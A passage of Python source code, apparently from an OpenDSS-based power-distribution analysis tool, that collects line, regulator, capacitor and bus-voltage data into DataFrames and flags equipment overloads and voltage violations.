collects line information.\r\n \r\n dss.Lines.Units() gives an integer. 
It can be mapped as below:\r\n units_config = [\"none\", \"mi\", \"kft\", \"km\", \"m\", \"Ft\", \"in\", \"cm\"] # Units key for lines taken from OpenDSS\r\n units_config[dss.Lines.Units() - 1]\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"line\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n check_enabled_property(all_df, element_name=\"line\")\r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n # extract only enabled lines\r\n all_df = all_df.loc[all_df[\"enabled\"].str.lower() == \"yes\"]\r\n all_df = add_info_line_definition_type(all_df)\r\n # define empty new columns\r\n all_df[\"kV\"] = np.nan\r\n all_df[\"h\"] = np.nan\r\n all_df[\"line_placement\"] = \"\"\r\n all_df[DSS_LINE_INT_FIELDS] = all_df[DSS_LINE_INT_FIELDS].astype(int)\r\n all_df[DSS_LINE_FLOAT_FIELDS] = all_df[DSS_LINE_FLOAT_FIELDS].astype(float)\r\n if compute_loading:\r\n all_df[\"max_amp_loading\"] = np.nan\r\n all_df[\"max_per_unit_loading\"] = np.nan\r\n all_df[\"status\"] = \"\"\r\n for index, row in all_df.iterrows():\r\n dss.Circuit.SetActiveBus(row[\"bus1\"])\r\n kv_b1 = dss.Bus.kVBase()\r\n dss.Circuit.SetActiveBus(row[\"bus2\"])\r\n kv_b2 = dss.Bus.kVBase()\r\n dss.Circuit.SetActiveElement(\"Line.{}\".format(row[\"name\"]))\r\n if round(kv_b1) != round(kv_b2):\r\n raise InvalidOpenDssElementError(\"To and from bus voltages ({} {}) do not match for line {}\".format(\r\n kv_b2, kv_b1, row['name']))\r\n all_df.at[index, \"kV\"] = kv_b1\r\n # Distinguish between overhead and underground cables\r\n # currently there is no way to distinguish directy using opendssdirect/pydss etc.\r\n # It is done here using property 'height' parameter and if string present in name\r\n placement_dict = determine_line_placement(row)\r\n for key in placement_dict.keys():\r\n all_df.at[index, key] = placement_dict[key] \r\n if row[\"units\"] == \"none\":\r\n # possible unit values: {none | mi|kft|km|m|Ft|in|cm } Default is None - assumes length units match impedance units.\r\n # if units match, then it returns none: in this case, assign value from other lines present in dataframe\r\n if dss.Lines.Units() != 0:\r\n all_df.at[index, \"units\"] = DSS_UNIT_CONFIG[dss.Lines.Units()]\r\n else:\r\n def_unit = all_df.units.unique()[0]\r\n if def_unit != \"none\":\r\n all_df.at[index, \"units\"] = def_unit\r\n else:\r\n all_df.at[index, \"units\"] = \"m\" # if a unit was not found, assign default of m\r\n # if line loading is to be computed\r\n if compute_loading:\r\n if upper_limit is None:\r\n raise Exception(\"Line upper limit is to be passed to function to compute line loading\")\r\n dss.Circuit.SetActiveElement(\"Line.{}\".format(row[\"name\"]))\r\n extract_magang = dss.CktElement.CurrentsMagAng()[: 2 * row[\"phases\"]]\r\n line_current = extract_magang[::2]\r\n max_amp_loading = max(line_current)\r\n max_per_unit_loading = round(max_amp_loading / row[\"normamps\"], 4)\r\n all_df.at[index, \"max_amp_loading\"] = max_amp_loading\r\n all_df.at[index, \"max_per_unit_loading\"] = max_per_unit_loading\r\n if max_per_unit_loading > upper_limit:\r\n all_df.at[index, \"status\"] = \"overloaded\"\r\n elif max_per_unit_loading == 0:\r\n all_df.at[index, \"status\"] = \"unloaded\"\r\n else:\r\n all_df.at[index, \"status\"] = \"normal\"\r\n all_df = all_df.reset_index(drop=True).set_index('name')\r\n all_df[\"kV\"] = all_df[\"kV\"].round(5)\r\n # add units to switch length (needed to plot graph). 
By default, length of switch is taken as max\r\n check_switch_property(all_df)\r\n all_df.loc[(all_df.units == 'none') & (all_df.Switch.str.lower() == \"yes\"), 'units'] = 'm'\r\n # if switch is to be ignored\r\n if ignore_switch:\r\n all_df = all_df.loc[all_df['Switch'].str.lower() == \"no\"]\r\n return all_df.reset_index()\r\n\r\n\r\ndef compare_multiple_dataframes(comparison_dict, deciding_column_name, comparison_type=\"max\"):\r\n \"\"\"This function compares all dataframes in a given dictionary based on a deciding column name\r\n\r\n Returns\r\n -------\r\n Dataframe\r\n \"\"\"\r\n summary_df = pd.DataFrame()\r\n for df_name in comparison_dict.keys():\r\n summary_df[df_name] = comparison_dict[df_name][deciding_column_name]\r\n if comparison_type == \"max\":\r\n label_df = summary_df.idxmax(axis=1) # find dataframe name that has max \r\n elif comparison_type == \"min\":\r\n label_df = summary_df.idxmax(axis=1) # find dataframe name that has min \r\n else:\r\n raise Exception(f\"Unknown comparison type {comparison_type} passed.\")\r\n final_list = []\r\n for index, label in label_df.items(): # index is element name\r\n temp_dict = dict(comparison_dict[label].loc[index])\r\n temp_dict.update({\"name\": index})\r\n final_list.append(temp_dict)\r\n final_df = pd.DataFrame(final_list)\r\n return final_df\r\n \r\n\r\n@track_timing(timer_stats_collector)\r\ndef get_thermal_equipment_info(compute_loading, equipment_type, upper_limit=None, ignore_switch=False, **kwargs):\r\n \"\"\"This function determines the thermal equipment loading (line, transformer), based on timepoint multiplier\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n timepoint_multipliers = kwargs.get(\"timepoint_multipliers\", None)\r\n multiplier_type = kwargs.get(\"multiplier_type\", LoadMultiplierType.ORIGINAL)\r\n # if there are no multipliers, run on rated load i.e. multiplier=1. 
0\r\n # if compute_loading is false, then just run once (no need to check multipliers)\r\n if (timepoint_multipliers is None) or (not compute_loading) or (multiplier_type == LoadMultiplierType.ORIGINAL): \r\n if compute_loading and multiplier_type != LoadMultiplierType.ORIGINAL:\r\n apply_uniform_timepoint_multipliers(multiplier_name=1, field=\"with_pv\", **kwargs)\r\n if equipment_type == \"line\":\r\n loading_df = get_all_line_info_instance(compute_loading=compute_loading, upper_limit=upper_limit, ignore_switch=ignore_switch)\r\n elif equipment_type == \"transformer\":\r\n loading_df = get_all_transformer_info_instance(compute_loading=compute_loading, upper_limit=upper_limit)\r\n return loading_df\r\n if multiplier_type == LoadMultiplierType.UNIFORM:\r\n comparison_dict = {}\r\n for pv_field in timepoint_multipliers[\"load_multipliers\"].keys():\r\n logger.debug(pv_field)\r\n for multiplier_name in timepoint_multipliers[\"load_multipliers\"][pv_field]:\r\n logger.debug(\"Multipler name: %s\", multiplier_name)\r\n # this changes the dss network load and pv\r\n apply_uniform_timepoint_multipliers(multiplier_name=multiplier_name, field=pv_field, **kwargs)\r\n if equipment_type.lower() == \"line\":\r\n deciding_column_name = \"max_per_unit_loading\"\r\n loading_df = get_all_line_info_instance(compute_loading=compute_loading, upper_limit=upper_limit, ignore_switch=ignore_switch)\r\n elif equipment_type.lower() == \"transformer\":\r\n deciding_column_name = \"max_per_unit_loading\"\r\n loading_df = get_all_transformer_info_instance(compute_loading=compute_loading, upper_limit=upper_limit)\r\n loading_df.set_index(\"name\", inplace=True)\r\n comparison_dict[pv_field+\"_\"+str(multiplier_name)] = loading_df\r\n # compare all dataframe, and create one that contains all worst loading conditions (across all multiplier conditions)\r\n loading_df = compare_multiple_dataframes(comparison_dict, deciding_column_name, comparison_type=\"max\")\r\n else:\r\n raise Exception(f\"Undefined multiplier_type {multiplier_type} passed.\") \r\n return loading_df\r\n \r\n\r\ndef get_regcontrol_info(correct_PT_ratio=False, nominal_voltage=None):\r\n \"\"\"This collects enabled regulator control information.\r\n If correcting PT ratio, the following information is followed (based on OpenDSS documentation)\r\n PT ratio: # If the winding is Wye, the line-to-neutral voltage is used. Else, the line-to-line voltage is used.\r\n # Here, bus kV is taken from Bus.kVBase\r\n \r\n Bus base kV: Returns L-L voltages for 2- and 3-phase. 
Else for 1-ph, return L-N voltage\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"regcontrol\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n check_enabled_property(all_df, element_name=\"regcontrol\") \r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n float_columns = ['winding', 'vreg', 'band', 'ptratio', 'delay']\r\n all_df[float_columns] = all_df[float_columns].astype(float)\r\n all_df['at_substation_xfmr_flag'] = False # by default, reg control is considered to be not at substation xfmr\r\n ckt_info_dict = get_circuit_info()\r\n sub_xfmr_present = False\r\n sub_xfmr_name = None\r\n if ckt_info_dict['substation_xfmr'] is not None:\r\n sub_xfmr_present = True\r\n sub_xfmr_name = ckt_info_dict['substation_xfmr']['name']\r\n if correct_PT_ratio:\r\n if nominal_voltage is None:\r\n raise Exception(\"Nominal voltage not provided to correct regcontrol PT ratio.\")\r\n all_df['old_ptratio'] = all_df['ptratio']\r\n \r\n for index, row in all_df.iterrows():\r\n dss.Circuit.SetActiveElement(\"Regcontrol.{}\".format(row[\"name\"]))\r\n reg_bus = dss.CktElement.BusNames()[0].split(\".\")[0]\r\n all_df.at[index, \"reg_bus\"] = reg_bus\r\n dss.Circuit.SetActiveBus(reg_bus)\r\n all_df.at[index, \"bus_num_phases\"] = dss.CktElement.NumPhases()\r\n all_df.at[index, \"bus_kv\"] = dss.Bus.kVBase()\r\n dss.Circuit.SetActiveElement(\"Transformer.{}\".format(row[\"transformer\"]))\r\n all_df.at[index, \"transformer_kva\"] = float(dss.Properties.Value(\"kva\"))\r\n dss.Transformers.Wdg(1) # setting winding to 1, to get kV for winding 1\r\n all_df.at[index, \"transformer_kv\"] = dss.Transformers.kV()\r\n all_df.at[index, \"transformer_conn\"] = dss.Properties.Value(\"conn\").strip() # opendss returns conn with a space \r\n all_df.at[index, \"transformer_bus1\"] = dss.CktElement.BusNames()[0].split(\".\")[0]\r\n all_df.at[index, \"transformer_bus2\"] = dss.CktElement.BusNames()[1].split(\".\")[0]\r\n if correct_PT_ratio:\r\n if (all_df.loc[index][\"bus_num_phases\"] > 1) and (all_df.loc[index][\"transformer_conn\"].lower() == \"wye\"):\r\n kV_to_be_used = all_df.loc[index][\"transformer_kv\"] * 1000 / math.sqrt(3)\r\n else:\r\n kV_to_be_used = all_df.loc[index][\"transformer_kv\"] * 1000\r\n # kV_to_be_used = dss.Bus.kVBase() * 1000\r\n all_df.at[index, \"ptratio\"] = kV_to_be_used / nominal_voltage\r\n if sub_xfmr_present and (row[\"transformer\"] == sub_xfmr_name): # if reg control is at substation xfmr\r\n all_df.at[index, 'at_substation_xfmr_flag'] = True\r\n all_df = all_df.reset_index(drop=True).set_index('name') \r\n all_df = all_df.loc[all_df['enabled'].str.lower() == \"yes\"]\r\n return all_df.reset_index()\r\n\r\n\r\ndef get_capacitor_info(nominal_voltage=None, correct_PT_ratio=False):\r\n \"\"\"\r\n This collects capacitor information.\r\n For correcting PT ratio, the following information and definitions are followed:\r\n # cap banks are 3 phase, 2 phase or 1 phase. 1 phase caps will have LN voltage\r\n # PT ratio: Ratio of the PT that converts the monitored voltage to the control voltage. \r\n # If the capacitor is Wye, the 1st phase line-to-neutral voltage is monitored.\r\n # Else, the line-to-line voltage (1st - 2nd phase) is monitored.\r\n # Capacitor kv: Rated kV of the capacitor (not necessarily same as bus rating). \r\n # For Phases=2 or Phases=3, it is line-to-line (phase-to-phase) rated voltage. 
\r\n # For all other numbers of phases, it is actual rating. (For Delta connection this is always line-to-line rated voltage). \r\n This function doesnt currently check if object is \"enabled\".\r\n \r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"capacitor\")\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n check_enabled_property(all_df, element_name=\"capacitor\") \r\n all_df[\"capacitor_name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n float_columns = [\"phases\", \"kv\"]\r\n all_df[float_columns] = all_df[float_columns].astype(float)\r\n all_df = all_df.reset_index(drop=True).set_index(\"capacitor_name\")\r\n # collect capcontrol information to combine with capcontrols\r\n capcontrol_df = get_cap_control_info()\r\n capcontrol_df.rename(columns={'name': 'capcontrol_name', 'capacitor': 'capacitor_name', 'type': 'capcontrol_type',\r\n 'equipment_type': 'capcontrol_present'}, inplace=True)\r\n capcontrol_df = capcontrol_df.set_index(\"capacitor_name\")\r\n # with capacitor name as index, concatenate capacitor information with cap controls\r\n all_df = pd.concat([all_df, capcontrol_df], axis=1)\r\n all_df.index.name = 'capacitor_name'\r\n all_df = all_df.reset_index().set_index('capacitor_name')\r\n \r\n if correct_PT_ratio and (len(capcontrol_df) > 0):\r\n if nominal_voltage is None:\r\n raise Exception(\"Nominal voltage not provided to correct capacitor bank PT ratio.\")\r\n all_df['old_PTratio'] = all_df['PTratio']\r\n \r\n # iterate over all capacitors\r\n for index, row in all_df.iterrows():\r\n all_df.at[index, \"kvar\"] = [float(a) for a in row[\"kvar\"]][0]\r\n # if capcontrol type is empty, then that capacitor does not have controls\r\n # correct PT ratios for existing cap controls\r\n if correct_PT_ratio and (len(capcontrol_df) > 0):\r\n if row[\"phases\"] > 1 and row[\"conn\"].lower() == \"wye\":\r\n kv_to_be_used = (row['kv'] * 1000) / math.sqrt(3)\r\n else:\r\n kv_to_be_used = row['kv'] * 1000\r\n all_df.at[index, \"PTratio\"] = kv_to_be_used / nominal_voltage\r\n return all_df.reset_index()\r\n\r\n\r\ndef get_cap_control_info():\r\n \"\"\"This collects capacitor control information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n all_df = dss.utils.class_to_dataframe(\"capcontrol\")\r\n if len(all_df) == 0:\r\n capcontrol_columns = [\"name\", \"equipment_type\", \"element\", \"terminal\", \"capacitor\", \r\n \"type\", \"PTratio\", \"CTratio\", \"ONsetting\", \"OFFsetting\", \"Delay\", \r\n \"VoltOverride\", \"Vmax\", \"Vmin\", \"DelayOFF\", \"DeadTime\", \"CTPhase\", \r\n \"PTPhase\", \"VBus\", \"EventLog\", \"UserModel\", \"UserData\", \"pctMinkvar\", \r\n \"Reset\", \"basefreq\", \"enabled\", \"like\"]\r\n return pd.DataFrame(columns=capcontrol_columns)\r\n check_enabled_property(all_df, element_name=\"capcontrol\")\r\n all_df[\"name\"] = all_df.index.str.split(\".\").str[1]\r\n all_df[\"equipment_type\"] = all_df.index.str.split(\".\").str[0]\r\n CAPCONTROL_FLOAT_FIELDS = [\"CTratio\", \"DeadTime\", \"Delay\", \"DelayOFF\", \"OFFsetting\", \"ONsetting\", \"PTratio\",\r\n \"Vmax\", \"Vmin\"]\r\n all_df[CAPCONTROL_FLOAT_FIELDS] = all_df[CAPCONTROL_FLOAT_FIELDS].astype(float)\r\n all_df = all_df.reset_index(drop=True).set_index(\"name\")\r\n return all_df.reset_index()\r\n\r\n\r\ndef get_line_geometry():\r\n \"\"\"This collects all line geometry information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 
'linegeometry'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n all_df[DSS_LINEGEOMETRY_FLOAT_FIELDS] = all_df[DSS_LINEGEOMETRY_FLOAT_FIELDS].astype(\"float\")\r\n all_df[DSS_LINEGEOMETRY_INT_FIELDS] = all_df[DSS_LINEGEOMETRY_INT_FIELDS].astype(\"int\")\r\n all_df = all_df[list(LineGeometryCatalogModel.schema(True).get(\"properties\").keys())]\r\n return all_df\r\n\r\n\r\ndef get_line_code():\r\n \"\"\"This collects all line codes information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'linecode'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n all_df[DSS_LINECODE_FLOAT_FIELDS] = all_df[DSS_LINECODE_FLOAT_FIELDS].astype(\"float\")\r\n all_df[DSS_LINECODE_INT_FIELDS] = all_df[DSS_LINECODE_INT_FIELDS].astype(\"int\")\r\n all_df = all_df[list(LineCodeCatalogModel.schema(True).get(\"properties\").keys())]\r\n return all_df\r\n\r\n\r\ndef get_wire_data():\r\n \"\"\"This collects all wire data information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'wiredata'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n return all_df\r\n\r\n\r\ndef get_cn_data():\r\n \"\"\"This collects all cn data information\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n active_class_name = 'cndata'\r\n all_df = dss.utils.class_to_dataframe(active_class_name)\r\n if len(all_df) == 0:\r\n return pd.DataFrame()\r\n all_df['name'] = all_df.index.str.split('.').str[1]\r\n all_df['equipment_type'] = all_df.index.str.split('.').str[0]\r\n all_df.reset_index(inplace=True, drop=True)\r\n return all_df\r\n\r\n\r\ndef check_dss_run_command(command_string):\r\n \"\"\"Runs dss command\r\n And checks for exception\r\n\r\n Parameters\r\n ----------\r\n command_string : str\r\n dss command to be run\r\n\r\n Raises\r\n -------\r\n OpenDssCompileError\r\n Raised if the command fails\r\n\r\n \"\"\"\r\n logger.debug(f\"Running DSS command: {command_string}\")\r\n result = dss.Text.Command(f\"{command_string}\")\r\n if result is not None:\r\n raise OpenDssCompileError(f\"OpenDSS run_command failed with message: {result}. \\nCommand: {command_string}\")\r\n\r\n\r\n@track_timing(timer_stats_collector)\r\ndef get_bus_voltages(voltage_upper_limit, voltage_lower_limit, raise_exception=True, **kwargs):\r\n \"\"\"This function determines the voltages, based on timepoint multiplier\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n timepoint_multipliers = kwargs.get(\"timepoint_multipliers\", None)\r\n multiplier_type = kwargs.get(\"multiplier_type\", LoadMultiplierType.ORIGINAL)\r\n # if there are no multipliers, run on rated load i.e. multiplier=1. 
0\r\n # if compute_loading is false, then just run once (no need to check multipliers)\r\n if (timepoint_multipliers is None) or (multiplier_type == LoadMultiplierType.ORIGINAL): \r\n if multiplier_type != LoadMultiplierType.ORIGINAL:\r\n apply_uniform_timepoint_multipliers(multiplier_name=1, field=\"with_pv\", **kwargs)\r\n # determine voltage violations after changes\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = get_bus_voltages_instance(\r\n voltage_upper_limit=voltage_upper_limit, voltage_lower_limit=voltage_lower_limit, raise_exception=raise_exception, \r\n **kwargs)\r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n if multiplier_type == LoadMultiplierType.UNIFORM:\r\n comparison_dict = {}\r\n for pv_field in timepoint_multipliers[\"load_multipliers\"].keys():\r\n logger.debug(pv_field)\r\n for multiplier_name in timepoint_multipliers[\"load_multipliers\"][pv_field]:\r\n logger.debug(\"Multipler name: %s\", multiplier_name)\r\n # this changes the dss network load and pv\r\n apply_uniform_timepoint_multipliers(multiplier_name=multiplier_name, field=pv_field, **kwargs)\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = get_bus_voltages_instance(\r\n voltage_upper_limit=voltage_upper_limit, voltage_lower_limit=voltage_lower_limit, raise_exception=raise_exception, **kwargs)\r\n bus_voltages_df.set_index(\"name\", inplace=True)\r\n comparison_dict[pv_field+\"_\"+str(multiplier_name)] = bus_voltages_df\r\n # compare all dataframe, and create one that contains all worst loading conditions (across all multiplier conditions)\r\n deciding_column_dict = {\"max_per_unit_voltage\": \"max\", \"min_per_unit_voltage\": \"min\"}\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = compare_multiple_dataframes_voltage(comparison_dict=comparison_dict, \r\n deciding_column_dict=deciding_column_dict,\r\n voltage_upper_limit=voltage_upper_limit,\r\n voltage_lower_limit=voltage_lower_limit)\r\n else:\r\n raise Exception(f\"Undefined multiplier_type {multiplier_type} passed.\") \r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n \r\n\r\n@track_timing(timer_stats_collector)\r\ndef get_bus_voltages_instance(voltage_upper_limit, voltage_lower_limit, raise_exception=True, **kwargs):\r\n \"\"\"This computes per unit voltages for all buses in network\r\n\r\n Returns\r\n -------\r\n DataFrame\r\n \"\"\"\r\n circuit_solve_and_check(raise_exception=raise_exception, **kwargs) # this is added as a final check for convergence\r\n all_dict = {}\r\n all_bus_names = dss.Circuit.AllBusNames()\r\n for bus_name in all_bus_names:\r\n dss.Circuit.SetActiveBus(bus_name)\r\n data_dict = {\r\n \"name\": bus_name,\r\n \"voltages\": dss.Bus.puVmagAngle()[::2],\r\n # \"kvbase\": dss.Bus.kVBase(),\r\n }\r\n data_dict[\"max_per_unit_voltage\"] = max(data_dict[\"voltages\"])\r\n data_dict[\"min_per_unit_voltage\"] = min(data_dict[\"voltages\"])\r\n data_dict['phase_imbalance'] = data_dict[\"max_per_unit_voltage\"] - data_dict[\"min_per_unit_voltage\"]\r\n\r\n # check for overvoltage violation\r\n if data_dict[\"max_per_unit_voltage\"] > voltage_upper_limit:\r\n data_dict['overvoltage_violation'] = True\r\n data_dict[\"max_voltage_deviation\"] = data_dict[\"max_per_unit_voltage\"] - voltage_upper_limit\r\n else:\r\n data_dict['overvoltage_violation'] = False\r\n data_dict[\"max_voltage_deviation\"] = 0.0\r\n\r\n # check for 
undervoltage violation\r\n if data_dict[\"min_per_unit_voltage\"] < voltage_lower_limit:\r\n data_dict['undervoltage_violation'] = True\r\n data_dict[\"min_voltage_deviation\"] = voltage_lower_limit - data_dict[\"min_per_unit_voltage\"]\r\n else:\r\n data_dict['undervoltage_violation'] = False\r\n data_dict[\"min_voltage_deviation\"] = 0.0\r\n all_dict[data_dict[\"name\"]] = data_dict\r\n\r\n all_df = pd.DataFrame.from_dict(all_dict, orient='index').reset_index(drop=True)\r\n undervoltage_bus_list = list(all_df.loc[all_df['undervoltage_violation'] == True]['name'].unique())\r\n overvoltage_bus_list = list(all_df.loc[all_df['overvoltage_violation'] == True]['name'].unique())\r\n buses_with_violations = list(set(undervoltage_bus_list + overvoltage_bus_list))\r\n return all_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n\r\n\r\ndef compare_multiple_dataframes_voltage(comparison_dict, deciding_column_dict, voltage_upper_limit, voltage_lower_limit):\r\n \"\"\"This function compares all dataframes in a given dictionary based on a deciding column \r\n\r\n Returns\r\n -------\r\n Dataframe\r\n \"\"\"\r\n all_df = pd.DataFrame()\r\n for deciding_column_name in deciding_column_dict.keys():\r\n summary_df = pd.DataFrame()\r\n comparison_type = deciding_column_dict[deciding_column_name]\r\n for df_name in comparison_dict.keys():\r\n label_df = pd.DataFrame()\r\n summary_df[df_name] = comparison_dict[df_name][deciding_column_name]\r\n if comparison_type == \"max\":\r\n label_df[deciding_column_name] = summary_df.idxmax(axis=1) # find dataframe name that has max \r\n elif comparison_type == \"min\":\r\n label_df[deciding_column_name] = summary_df.idxmin(axis=1) # find dataframe name that has min \r\n else:\r\n raise Exception(f\"Unknown comparison type {comparison_type} passed.\")\r\n final_list = []\r\n for index, row in label_df.iterrows(): # index is element name\r\n label = row[deciding_column_name]\r\n temp_dict = {deciding_column_name: comparison_dict[label].loc[index][deciding_column_name]}\r\n temp_dict.update({\"name\": index})\r\n final_list.append(temp_dict)\r\n temp_df = pd.DataFrame(final_list)\r\n temp_df.set_index(\"name\", inplace=True)\r\n all_df = pd.concat([all_df, temp_df], axis=1)\r\n bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations = get_voltage_violations(voltage_upper_limit=voltage_upper_limit, \r\n voltage_lower_limit=voltage_lower_limit, \r\n bus_voltages_df=all_df)\r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n \r\n \r\ndef get_voltage_violations(voltage_upper_limit, voltage_lower_limit, bus_voltages_df):\r\n \"\"\"Function to determine voltage violations\r\n \"\"\"\r\n bus_voltages_df['overvoltage_violation'] = False\r\n bus_voltages_df['undervoltage_violation'] = False\r\n bus_voltages_df['max_voltage_deviation'] = 0.0\r\n bus_voltages_df['min_voltage_deviation'] = 0.0\r\n \r\n for index, row in bus_voltages_df.iterrows():\r\n # check for overvoltage violation\r\n if row[\"max_per_unit_voltage\"] > voltage_upper_limit:\r\n bus_voltages_df.at[index, 'overvoltage_violation'] = True\r\n bus_voltages_df.at[index, \"max_voltage_deviation\"] = row[\"max_per_unit_voltage\"] - voltage_upper_limit\r\n else:\r\n bus_voltages_df.at[index, 'overvoltage_violation'] = False\r\n bus_voltages_df.at[index, \"max_voltage_deviation\"] = 0.0\r\n\r\n # check for undervoltage violation\r\n if row[\"min_per_unit_voltage\"] < voltage_lower_limit:\r\n bus_voltages_df.at[index, 
'undervoltage_violation'] = True\r\n bus_voltages_df.at[index, \"min_voltage_deviation\"] = voltage_lower_limit - row[\"min_per_unit_voltage\"]\r\n else:\r\n bus_voltages_df.at[index, 'undervoltage_violation'] = False\r\n bus_voltages_df.at[index, \"min_voltage_deviation\"] = 0.0\r\n \r\n bus_voltages_df.reset_index(inplace=True)\r\n undervoltage_bus_list = list(bus_voltages_df.loc[bus_voltages_df['undervoltage_violation'] == True]['name'].unique())\r\n overvoltage_bus_list = list(bus_voltages_df.loc[bus_voltages_df['overvoltage_violation'] == True]['name'].unique())\r\n buses_with_violations = list(set(undervoltage_bus_list + overvoltage_bus_list))\r\n return bus_voltages_df, undervoltage_bus_list, overvoltage_bus_list, buses_with_violations\r\n \r\n\r\ndef determine_available_line_upgrades(line_loading_df):\r\n \"\"\"This function creates a dataframe of available line upgrades by dropping duplicates from line dataframe passed.\r\n \"\"\"\r\n all_property_list = list(LineCatalogModel.schema(True).get(\"properties\").keys())\r\n determining_property_list = _extract_specific_model_properties_(model_name=LineCatalogModel, field_type_key=\"determine_upgrade_option\", field_type_value=True)\r\n line_loading_df[\"kV\"] = line_loading_df[\"kV\"].round(5)\r\n if 'line_definition_type' not in line_loading_df.columns: # add line_definition_type if not present\r\n line_loading_df = add_info_line_definition_type(line_loading_df)\r\n if 'line_placement' not in line_loading_df.columns:\r\n for index, row in line_loading_df.iterrows(): # add line_placement and h if not present\r\n info_dict = determine_line_placement(row)\r\n for key in info_dict.keys():\r\n line_loading_df.at[index, key] = info_dict[key] \r\n line_upgrade_options = line_loading_df[all_property_list]\r\n # remove duplicate line upgrade options (that might have a different name, but same parameters)\r\n line_upgrade_options = line_upgrade_options.loc[line_upgrade_options.astype(str).drop_duplicates(subset=determining_property_list, keep=\"first\").index]\r\n line_upgrade_options.reset_index(drop=True, inplace=True)\r\n if not line_upgrade_options[\"name\"].is_unique: # if line upgrade option names are not unique, create new names\r\n line_upgrade_options = line_upgrade_options.reset_index().rename(columns={'index': 'name'})\r\n line_upgrade_options['name'] = 'line_' + line_upgrade_options['name'].astype(str)\r\n return line_upgrade_options[all_property_list]\r\n\r\n\r\ndef determine_available_xfmr_upgrades(xfmr_loading_df):\r\n \"\"\"This function creates a dataframe of available transformer upgrades by dropping duplicates from transformer dataframe passed.\r\n Input dataframe will need to contain \"amp_limit_per_phase\" column. 
So if external catalog is supplied, ensure it contains that column.\r\n \"\"\"\r\n all_property_list = list(TransformerCatalogModel.schema(True).get(\"properties\").keys())\r\n determining_property_list = _extract_specific_model_properties_(model_name=TransformerCatalogModel, field_type_key=\"determine_upgrade_option\", field_type_value=True)\r\n xfmr_upgrade_options = xfmr_loading_df[all_property_list]\r\n xfmr_upgrade_options = xfmr_upgrade_options.loc[xfmr_upgrade_options.astype(str).drop_duplicates(subset=determining_property_list, keep=\"first\").index]\r\n xfmr_upgrade_options.reset_index(drop=True, inplace=True)\r\n if not xfmr_upgrade_options[\"name\"].is_unique: # if xfmr upgrade option names are not unique, create new names\r\n xfmr_upgrade_options = xfmr_upgrade_options.reset_index().rename(columns={'index': 'name'})\r\n xfmr_upgrade_options['name'] = 'xfmr_' + xfmr_upgrade_options['name'].astype(str)\r\n return xfmr_upgrade_options\r\n\r\n\r\ndef remove_duplicate_line_upgrades(line_upgrades_df):\r\n if line_upgrades_df.empty:\r\n return line_upgrades_df\r\n upgrades_subset = line_upgrades_df.loc[line_upgrades_df[\"action\"] == \"add\"]\r\n duplicate_equip = list(upgrades_subset[upgrades_subset.final_equipment_name.duplicated()].final_equipment_name.unique())\r\n if not duplicate_equip:\r\n return line_upgrades_df\r\n upgrades_subset = upgrades_subset.groupby('final_equipment_name', group_keys=False).apply(lambda df: df.fillna(method='ffill'))\r\n upgrades_subset = upgrades_subset.loc[upgrades_subset[\"final_equipment_name\"].duplicated(keep=False)]\r\n duplicates_final = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"upgrade\"]\r\n duplicates_final = duplicates_final.sort_values(\"normamps\", ascending=False)\r\n duplicates_final = duplicates_final.drop_duplicates(subset=[\"upgrade_type\", \"action\", \"final_equipment_name\"], keep=\"first\") # drop any duplicate rows, keeping highest rating\r\n duplicates_final[\"upgrade_type\"] = \"new_parallel\"\r\n duplicates_final = duplicates_final.drop(columns=[\"original_equipment_name\"])\r\n # get original equipment name : \r\n og = upgrades_subset.loc[upgrades_subset[\"upgrade_type\"] == \"new_parallel\"].set_index(\"final_equipment_name\")[[\"original_equipment_name\"]]\r\n 